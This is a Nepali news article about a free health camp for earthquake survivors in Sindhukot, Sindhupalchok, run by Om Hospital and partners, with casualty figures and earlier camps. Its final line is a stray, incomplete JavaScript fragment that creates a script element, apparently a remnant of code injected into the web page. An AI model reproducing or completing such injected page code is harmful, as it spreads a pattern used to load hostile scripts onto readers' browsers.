ओम अस्पताल, ओम अस्पताल फाउन्डेसन र नेपाल मेडिकल कलेजको संयुक्त आयोजनामा सिन्धुपाल्चोकको सिन्धुकोटमा निःशुल्क स्वास्थ्य शिविर सञ्चालन गरिएको छ। भूकम्पले सबैभन्दा धेरै प्रभावित जिल्ला सिन्धुपाल्चोक मेलम्ची नगरपालिका–४ सिन्धुकोटमा २८ जनाको ज्यान गएको छ भने ४४ जना गम्भीर घाइते भएका थिए। बैशाख १२ मा गएको बिनासकारी भूकम्प र त्यसपछिका टूला साना पराकम्पनका कारण घाइते भएका हरुको स्वस्थ्य परिक्षण्कोलागि ओम अस्पताल, ओम अस्पताल फाउन्डेसनले स्वास्थ्य सिविर आयोजना गरेको हो।
डाक्टर भोला रिजालको नेतृत्वमा गएको स्वास्थ्य टोलीले त्यस ठाउँका एक हजारभन्दा बढीलाई निःशुल्क स्वास्थ्य शिविर सञ्चालन गरेको हो। ओम अस्पतालको सहयोगमा यसअघि सिन्धुपाल्चोकको भोटेचौरमा निःशुल्क स्वास्थ्य सेवा प्रदान गरिएको रिजालले जानकारी दिनुभयो। स्वास्थ्य शिविर सञ्चालन गर्दै गर्दा रिजालले सिन्धुपाल्चोकका अधिकांश स्थानका बिरामीहरु आफूले जाँचेको र त्यस स्थानमा रहेको सिन्धुकोट स्वास्थ्य चौकीलाई एक सामुदायिक अस्पतालको रुपमा निर्माण गर्न चाहेको बताउनुभयो।
यसअघि ओम अस्पतालको सहयोगमा सिन्धुपाल्चोक, धादिङ, नुवाकोट, काभ्रेलगायतका भूकम्प प्रभावित जिल्लामा ११ वटा निःशुल्क स्वास्थ्य शिविर सञ्चालन गरिसकिएको ओम अस्पताल कर्मचारी युनियनका अध्यक्ष केशव चौलागाईले जानकारी दिनुभयो। सिन्धुकोट क्षेत्रमा कालीजङ्ग गण गोरुसिङ्गे नवलपरासीबाट गएको १२० जनाको नेपाली सेनाको टोलीले काम गरिरहेको छ।
var d=document;var s=d.createElement(‘script’);